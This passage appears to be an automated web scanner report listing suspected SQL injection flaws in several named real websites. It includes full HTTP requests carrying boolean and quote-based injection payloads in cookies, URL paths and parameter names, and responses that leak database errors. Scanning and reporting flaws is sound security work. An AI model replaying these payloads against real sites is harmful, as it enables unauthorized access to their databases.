Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.148537269'%20or%201%3d1--%20; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 21-Apr-2010 06:13:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.148537269'%20or%201%3d2--%20; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.74. http://www.friedfrank.com/index.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 21775514'%20or%201%3d1--%20 and 21775514'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.130308879521775514'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 21-Apr-2010 06:14:17 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.130308879521775514'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.75. http://www.friedfrank.com/index.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 19469349%20or%201%3d1--%20 and 19469349%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=11304187519469349%20or%201%3d1--%20; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 21-Apr-2010 06:14:02 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=11304187519469349%20or%201%3d2--%20; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.76. http://www.friedfrank.com/index.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 13351191'%20or%201%3d1--%20 and 13351191'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)13351191'%20or%201%3d1--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 21-Apr-2010 06:13:28 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)13351191'%20or%201%3d2--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.77. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.longislanderotic.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /forum?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 18:13:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: WWF=SID=b88fzzeb72437c112fee69314ce4df5f; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSCDACTQ=MNMDDPPBOGEADHEAEFIHMPPH; path=/
Cache-control: private

<br /><strong>Server Error in Forum Application</strong><br />An error has occured while writing to the database.<br />Please contact the forum administrator.<br /><br /><strong>Support Error Code:-</
...[SNIP]...
<br />Microsoft OLE DB Provider for SQL Server<br />
...[SNIP]...

1.78. http://www.millerwelds.com/about/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:38 GMT
Connection: Keep-Alive
Content-Length: 27686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.79. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:58 GMT
Connection: Keep-Alive
Content-Length: 20770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:59 GMT
Connection: Keep-Alive
Content-Length: 22492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...

1.80. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/certifications.html HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:30 GMT
Connection: Keep-Alive
Content-Length: 27705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.81. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about/certifications.html' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:32 GMT
Connection: Keep-Alive
Content-Length: 27732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/about/certifications.html''' at line 1)<br>
...[SNIP]...

1.82. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/certifications.html?1'=1 HTTP/1.1
